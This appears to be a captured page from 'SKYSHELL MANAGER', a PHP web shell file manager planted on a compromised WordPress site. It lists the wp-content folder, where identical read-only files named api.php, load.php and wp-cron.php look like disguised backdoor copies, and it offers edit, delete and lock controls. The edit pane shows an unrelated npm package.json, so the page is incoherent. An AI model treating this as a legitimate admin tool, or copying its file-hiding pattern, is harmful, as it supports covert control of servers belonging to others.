📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "lcov-parse", "description": "Parse lcov results files and return JSON", "version": "1.0.0", "author": "Dav Glass <davglass@gmail.com>", "contributors": [ "Alan Gutierrez <alan@prettyrobots.com>", "Gerard Escalante <gerard@saygo.ca>", "Daniel Howe <dhowe@swipeclock.com>" ], "bin": { "lcov-parse": "./bin/cli.js" }, "bugs": { "url": "http://github.com/davglass/lcov-parse/issues" }, "main": "./lib/index", "tags": [ "lcov", "json", "coverage", "parser" ], "devDependencies": { "istanbul": "^0.2.10", "jshint": "^2.5.1", "vows": "*", "yui-lint": "~0.1.1" }, "scripts": { "pretest": "jshint --config ./node_modules/yui-lint/jshint.json ./lib/", "test": "istanbul cover --print both ./node_modules/vows/bin/vows -- --spec ./tests/*.js" }, "license": "BSD-3-Clause", "repository": { "type": "git", "url": "http://github.com/davglass/lcov-parse.git" } }
Save